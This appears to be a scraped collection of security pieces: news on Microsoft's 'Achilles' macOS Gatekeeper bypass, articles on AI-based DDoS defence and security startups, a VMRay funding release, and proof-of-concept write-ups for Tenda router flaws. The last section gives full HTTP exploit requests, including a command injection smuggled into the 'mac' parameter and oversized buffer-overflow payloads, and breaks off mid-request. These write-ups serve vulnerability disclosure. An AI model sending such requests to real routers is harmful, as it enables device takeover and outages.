The latest bypass for Apple's application-safety feature could allow malicious takeover of Macs.

A bypass vulnerability in macOS for Apple's Gatekeeper mechanism could allow cyberattackers to execute malicious applications on target Macs — regardless of whether Lockdown mode is enabled.

Among the details on the bug (CVE-2022-42821), which Microsoft dubbed "Achilles," is the fact that researchers were able to craft a working exploit using the Access Control Lists (ACL) mechanism in macOS, which allows fine-tuned permissioning for applications.

**Popular Target: Apple Gatekeeper for Vetting Applications**

Apple Gatekeeper is a security mechanism designed to ensure that only "trusted apps" run on Mac devices — i.e., those that are signed by a valid authority and approved by Apple. If the software can't be validated by Gatekeeper, the user gets a blocking pop-up explaining that the app can't be executed.

In theory, this mitigates the threat of malicious sideloaded applications that users might accidentally download from pirate sites or third-party app stores. The issue, though, is that bad actors have devoted quite a bit of time to finding bypass avenues for the feature, Microsoft researchers noted, as shown by previous exploited vulnerabilities such as CVE-2022-22616, CVE-2022-32910, CVE-2021-1810, CVE-2021-30657, CVE-2021-30853, CVE-2019-8656, and CVE-2014-8826.

And no wonder: "Gatekeeper bypasses such as this could be leveraged as a vector for initial access by malware and other threats and could help increase the success rate of malicious campaigns and attacks on macOS," Microsoft researchers warned in an advisory issued this week. "Our data shows that fake apps remain one of the top entry vectors on macOS, indicating Gatekeeper bypass techniques are an attractive and even a necessary capability for adversaries to leverage in attacks."

**Uncovering a New Gatekeeper Bypass**

Piggybacking off of details surrounding CVE-2021-1810, Microsoft researchers looked to create a new bypass — which they managed to do by appending malicious files with special permissioning rules via the ACL mechanism.

Apple employs a quarantine mechanism for downloaded apps, according to the advisory: "When downloading apps from a browser, like Safari, the browser assigns a special extended attribute to the downloaded file. That attribute is named com.apple.quarantine and is later used to enforce policies such as Gatekeeper."

However, there is an additional option in macOS to apply a special extended attribute named com.apple.acl.text, which is used to set arbitrary ACLs.

"Each ACL has one or more Access Control Entries (ACEs) that dictate what each principal can or cannot do, much like firewall rules," Microsoft researchers explained. "Equipped with this information, we decided to add very restrictive ACLs to the downloaded files. Those ACLs prohibit Safari (or any other program) from setting new extended attributes, including the com.apple.quarantine attribute."

And without the quarantine attribute in place, Gatekeeper is not alerted to check the file, which allows it to bypass the security mechanism altogether.

Crucially, Microsoft researchers found that Apple's Lockdown feature, which it debuted in July to prevent state-sponsored spyware from infecting at-risk targets, can't thwart the Achilles attack.

"We note that Apple’s Lockdown Mode, introduced in macOS Ventura as an optional protection feature for high-risk users that might be personally targeted by a sophisticated cyberattack, is aimed to stop zero-click remote code execution exploits, and therefore does not defend against Achilles," according to Microsoft.

The issue was disclosed to Apple in July, with fixes rolling out in the latest macOS version. To protect themselves, Mac users are encouraged to update their operating systems to the latest version as soon as possible.

Microsoft Warns on 'Achilles' macOS Gatekeeper Bypass

When properly designed and trained, artificial intelligence and machine learning can help improve the accuracy of distributed denial-of-service detection and mitigation.

After early excitement about artificial intelligence (AI) in the late 1980s and early 1990s, followed by a couple of "AI winters" — periods of reduced funding, interest and even disillusionment — we now again see great enthusiasm about all things related to AI and machine learning (ML). It is no wonder that AI/ML is also being considered for network security, including distributed denial-of-service (DDoS) protection.

It's not that AI/ML algorithms have changed so radically — but they have matured. In network security, like in many other fields, the abundance of data and greater-than-ever processing power makes it feasible to implement new AI/ML algorithms in silicon or in the cloud, allowing us to teach machines to be more accurate and faster than humans are.

With DDoS security, the problem is distinguishing "good" from "bad" traffic and minimizing the mitigative actions to reduce the effect on "good" traffic. Apart from accuracy and speed, the percentage of false positives indicates how good your detection is — the lower, the better. Until recently, the industry-accepted rate of 5% to 10% false positives meant that neutralizing a 2Tbps-size DDoS attack could also block 100Gbps to 200Gbps of legitimate network traffic. This needs to improve by at least an order of magnitude.

**AI/ML for Better DDoS Detection**

AI/ML can help network security teams make more accurate and faster decisions about what constitutes a DDoS threat or is an ongoing attack. Knowing the larger Internet-security context is essential — a global perspective of traffic down to the IP address level, with prior history of traffic patterns and abuse — can help prevent making a snap decision about whether certain traffic flows are legitimate. It's like a credit card company tracking all transactions in order to decide which ones are fraudulent.

Big data collected from the network itself — in the form of telemetry from IP routers, enhanced with the larger security context — provides a great base for training AI/ML models to recognize DDoS patterns. Still, human intelligence is irreplaceable: People need to teach AI/ML what to look for. And there is a lot to be taught, from recognizing a botnet DDoS (coming from thousands of IoT devices as regular IP traffic) to understanding when seemingly separate network patterns are all parts of a larger, coordinated DDoS activity.

**Better Mitigation, Too**

Another important role for AI/ML is in defining DDoS mitigation strategies and driving real-time tactics based on changing network conditions and mitigation results.

DDoS detection is a big data problem with somewhat unconstrained resources, limited only by the processing platforms. DDoS mitigation, however, is a problem where resources are constrained. Mitigation capabilities, capacity, and scale can differ from product to product and from one network to another. The actual mitigative actions need to consider all of those details and more — preferences about the number of security filters applied on routers, whether NETCONF or Flowspec should be used, etc. All of these constraints can be passed to an AI/ML system to drive networkwide AI/ML-optimized mitigation.

Additionally, AI/ML algorithms could be used to calculate the efficiency (as measured by false-positive rates) of suggested mitigation scenarios and to test and evaluate different what-if scenarios offline to improve the mitigation further.

**Understanding Wider Context Is Key**

Big data platforms can efficiently sift through massive amounts of data, ingesting information about the Internet-wide security-related context and real-time network data about network flows, usage patterns, and other relevant metrics.

With the help of AI/ML algorithms, it is now possible to detect DDoS activity early and take immediate, targeted, and optimized mitigation measures to thwart such attacks.

By incorporating big data analytics and AI/ML into all stages of a comprehensive DDoS security strategy, we can guard our networks against malicious DDoS attacks, keep the services running, and protect users online.

How AI/ML Can Thwart DDoS Attacks

Startups are coalescing around effective data loss prevention, reducing data attack surfaces, and viable AI automation.

Investors in tech startups like to maintain communities of independent CISOs that entrepreneurs use to explore threats and unsolved problems and to pitch solutions to. In this incubation space, several technologies have begun to stand out: enterprise Web browsers, data posture management, and new takes on automation.

And here's what they have in common: They're innovations that reduce complexity. Consider the impossibility of deploying agents or security controls across heterogeneous devices. To achieve full coverage, they must span employees, third parties, and post-M&A workforces — including personal devices that hit the cloud.

RSA's 2022 Innovation Sandbox winner, Talon Cyber Security, and the startup Island, both believe the enterprise Web browser can solve this and become an external leg of the cloud security architecture.

User data travels in an encrypted connection between the cloud and the browser, the latter of which has been leaky. These new browsers are hardened to malware, contain data loss by blocking uploads, downloads, screen captures, or cut and paste. They also add a layer of privacy. As Ashland CISO Bob Schuetter notes, his secure browser masks Social Security numbers on the screen "so the service reps don't have to look at the actual numbers all day."

These browsers even allow recording sessions for visual playback during incident response. “In reality, what they are is a secure gateway for tracking who's using what SaaS resources,” says Dr. Shane Shook, a cybercrime consultant and expert witness.

Compartmentalized away from the rest of the endpoint, a secure browser sandboxes Web client code, contains the accessed cloud data, and secures traffic between device and cloud. Proponents believe it could become the new cloud perimeter and deliver some of the failed promises of data loss prevention.

**Automation Is Bigger Than SOAR**

2022’s upstarts are pushing automation beyond the security orchestration and automated response (SOAR) category. Many of them note that SOAR speaks to a past when security was dominated by incident response.

Cybersecurity is now under the CIO as much as the CISO. All this creates a huge divide between the CISO's organization that detect threats and the remediation plans which must span multiple departments, and often extend to partners.

There are a number of approaches here. SOAR startups Opus Security and Revelstoke push knowledge dissemination and best practices beyond the CISO. Torq, an Innovation Sandbox finalist, is being used to automate backlogs in IT account provisioning, a byproduct of identity attacks.

BrazenCloud envisions upgrading the plumbing beneath SOAR’s automation, which today mostly involves calling the APIs of other security applications. Yet scripting, open source, and one-off tools are popular in cybersecurity. This leads to the belief that cybersecurity's automation providers should be the ones to move and execute these tool’s binaries and return their outputs — even for the notoriously ephemeral cloud workloads.

**Making Data Security Cloud Native**

On-premises data security was never that good at answering what data we have, where it's located, and who's accessing it. Now, this deficiency is getting addressed as data and metadata become increasingly distributed across multiple clouds.

Analysts are calling it data security posture management (DSPM), which unfortunately sounds like an older cloud security posture management (CSPM) category that Gartner split after ballooning out of control.

The more focused data posture management products integrate with cloud APIs, and map data and its usage. They aspire to relieve the ransomware threat with oversight into backups and to reduce the attack surface by sunsetting old data.

Despite the mind numbing acronyms, this new data-focused category is hot in 2022, with Concentric AI, Laminar, and Eureka Security receiving investments.

The sudden interest here is more than faddish copycatting. Cloud computing requires a higher bar for data security. Not being behind a well-defined perimeter, the cloud is public by default and thus hackers are one authentication hop from accessing the crown jewels.

**Will AI Finally Deliver Cybersecurity Real Value?**

Cybersecurity's buzzword merchants have undermined artificial intelligence and machine learning, turning theminto gratuitous boxes to check. Yet a new generation of practitioners educated in AI and ML see routine success using facial and voice recognition. AI’s success outside cybersecurity, such as facial recognition, has come from tackling narrow problems where sophisticated examples exist to model or train against.

The startup community has begun wielding AI’s strengths to take the small stuff off the hands of practitioners. Some believe advanced virtual assistants (AVAs), similar to Siri or the writing-aide Grammarly, are an aspect of AI that can succeed in cybersecurity.

StrikeReady delivers the detection and response tools a practitioner would use, along with an AVA trained to handle certain security operations center (SOC) logistics. Another unnamed startup, still in stealth mode, is beta testing AVAs that curb the risky behaviors of end users.

Within startup incubation spaces, enterprise Web browsers, virtual assistants, DSPM, and new automation may prove to be the new disruptors. Or they could just end up as a venture capitalist's write-off. Either way, it's the market — and security practitioners in the SOC — who will be the final arbiters of what’s useful and innovative.

Coming to a SOC Near You: New Browsers, 'Posture' Management, Virtual Assistants

VMRay announces the closing of a Series B led by global alternative asset manager Tikehau Capital, which will fuel further expansion of the product portfolio to target a broader set of market segments.

**BOCHUM, GERMANY (PRWEB)** **DECEMBER 20, 2022 --** VMRay, a global player in advanced threat detection and analysis that offers solutions for enterprises, governmental organizations, and MDRs to detect and analyze the most challenging malware and phishing threats, announces the closing of a Series B led by global alternative asset manager Tikehau Capital, through its subsidiary Tikehau Ace Capital and its European Cybersecurity Growth fund alongside new investors NRW.BANK and Gründerfonds Ruhr. Previous investors eCAPITAL and High-Tech Gründerfonds also participated in the round. The new investment will fuel further expansion of the product portfolio to target a broader set of market segments.

VMRay was founded to overcome a big vulnerability in cybersecurity: new, unknown, and sophisticated threats and targeted attacks. The company started its journey by developing a unique, hypervisor-based approach to sandboxing, and kept adding cutting-edge technologies, including its own Machine Learning models, to address emerging and evolving challenges. The solutions aim at improving the efficiency of SOC teams with accurate verdicts, noise-free output, and seamless integrations with major EDR, XDR, SOAR, and Threat Intelligence Platform vendors. The company is now working with 4 of the world’s top 5 technology companies, 37 leading financial institutions and 56 governmental organizations around the world.

“The cyber threat landscape is going through a profound change, and with the increasing volume and complexity of new threats, our customers face new challenges,” said Dr. Carsten Willems, co-founder and CEO of VMRay. “The latest investment has been a collaboration with a strategic scope, enabling VMRay to make its product suitable for a wider range of market segments and use cases including threat intelligence, security automation and MSSPs.” 

“In our role as cybersecurity-focused experts, we were impressed with VMRay's unique value proposition: building more effective detection tools integrated or interfaced with larger cybersecurity solutions. VMRay's ability to automate detection is a clear differentiator, positioning it as the tip of the spear in the global effort to elevate cybersecurity standards globally," said Augustin Blanchard, Executive Director at Tikehau Capital. "We firmly believe the company will sustain scalable, explosive growth in the coming years, driven by skilled leadership and powerful market tailwinds.”

“VMRay has managed to uniquely position themselves in the market, complementing existing solutions as the extra layer of security that is needed to combat advanced and unknown threats,” said Dr. Ulrich Schmitt from High-Tech Gründerfonds. “Having built a strong foundation for further international growth, the company is set to become the global leader in advanced threat detection, and we are excited to support the VMRay team in the years to come.”

Willi Mannheims, Managing Partner at eCAPITAL added, “We’re delighted to be partnering with a syndicate of top investors to continue fueling VMRay’s success and support the company’s experienced management team in driving growth.”

About VMRay  
At VMRay, our purpose is to liberate the world from undetectable digital threats.Led by reputable cyber security pioneers, we develop best-of-breed technologies to detect and analyze unknown threats that others miss. Thus, we empower organizations to augment and automate security operations by providing the world’s best threat detection and analysis platform. We help organizations build and grow their products, services, operations, and relationships on secure ground that allows them to focus on what matters with ultimate peace of mind. This, for us, is the foundation stone of digital transformation.

Cybersecurity Company VMRay Extends Series B Investment to a Total of $34M USD to Drive Growth into New Markets

Tenda F1203 V2.0.1.6 was discovered to contain a command injection vulnerability via the mac parameter at /goform/WriteFacMac.

Tenda Router **F1203 V2.0.1.6** was found to contain a command injection vulnerability in formWriteFacMac.This vulnerability allows an attacker to execute arbitrary commands through the "mac" parameter.

This vulnerability lies in the /goform/WriteFacMac page，The details are shown below:

This POC can result in a Dos.

    POST /goform/WriteFacMac HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4110
    
    mac=00:01:02:11:22:33;echo%20hello

CVE-2022-46538: CVE-vulns/formWriteFacMac.md at main · Double-q1015/CVE-vulns

Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the funcpara1 parameter in the formSetCfm function.

Tenda Router **i22 V1.0.0.3(4687)** was discovered to contain a buffer overflow in the httpd module when handling /goform/setcfm request.

    int __fastcall sub_69F64(const char *a1, char *a2, unsigned __int8 a3)
    {
      int result; // r0
      char v7[8]; // [sp+14h] [bp-160h] BYREF
      char v8[256]; // [sp+1Ch] [bp-158h] BYREF
      char s[64]; // [sp+11Ch] [bp-58h] BYREF
      char *v10; // [sp+15Ch] [bp-18h]
      int v11; // [sp+160h] [bp-14h]
      char *v12; // [sp+164h] [bp-10h]
    
      memset(s, 0, sizeof(s));
      memset(v8, 0, sizeof(v8));
      v11 = 0;
      if ( strlen(a2) > 4 )
      {
        ++v11;
        v12 = a2;
        while ( 1 )
        {
          v10 = strchr(v12, a3);
          if ( !v10 )
            break;
          *v10++ = 0;
          memset(s, 0, sizeof(s));
          sprintf(s, "%s.list%d", a1, v11);
          SetValue(s, v12);
          v12 = v10;
          ++v11;
        }
        memset(s, 0, sizeof(s));
        sprintf(s, "%s.list%d", a1, v11);
        SetValue(s, v12);
        sprintf(v7, "%d", v11);
        sprintf(s, "%s.listnum", a1);
        SetValue(s, v7);
        memset(s, 0, sizeof(s));
        sprintf(s, "%s.list%d", a1, ++v11);
        result = GetValue(s, v8);
        while ( v8[0] )
        {
          UnSetValue(s);
          memset(s, 0, sizeof(s));
          memset(v8, 0, sizeof(v8));
          sprintf(s, "%s.list%d", a1, ++v11);
          result = GetValue(s, v8);
        }
      }
      else
      {
        memset(s, 0, sizeof(s));
        sprintf(s, "%s.listnum", a1);
        SetValue(s, "0");
        memset(s, 0, sizeof(s));
        memset(v8, 0, sizeof(v8));
        sprintf(s, "%s.list%d", a1, ++v11);
        result = GetValue(s, v8);
        while ( v8[0] )
        {
          UnSetValue(s);
          memset(s, 0, sizeof(s));
          memset(v8, 0, sizeof(v8));
          sprintf(s, "%s.list%d", a1, ++v11);
          result = GetValue(s, v8);
        }
      }
      return result;
    }
    

This POC can result in a Dos.

    POST /goform/setcfm HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 2101
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.204.133
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.204.133/system_hostname.asp?version=1487847846
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: bLanguage=cn; password=jbl1qw; user=
    Connection: close
    
    funcname=save_list_data&funcpara2=aaaaa&funcpara1=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-45665: CVE-vulns/formWifiMacFilterSet.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the deviceId parameter at /goform/addWifiMacFilter.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/addWifiMacFilter request.

This vulnerability lies in the /goform/addWifiMacFilter page，The details are shown below:

This POC can result in a Dos.

    POST /goform/addWifiMacFilter HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: user=admin
    Connection: close
    Content-Length: 4111
    
    deviceId=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-46531: CVE-vulns/addWifiMacFilter_deviceId.md at main · Double-q1015/CVE-vulns

Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the deviceMac parameter at /goform/addWifiMacFilter.

Tenda Router **F1203 V2.0.1.6** was discovered to contain a buffer overflow in the httpd module when handling /goform/addWifiMacFilter request.

This vulnerability lies in the /goform/addWifiMacFilter page，The details are shown below:

This POC can result in a Dos.

    POST /goform/addWifiMacFilter HTTP/1.1
    Host: 192.168.204.143
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
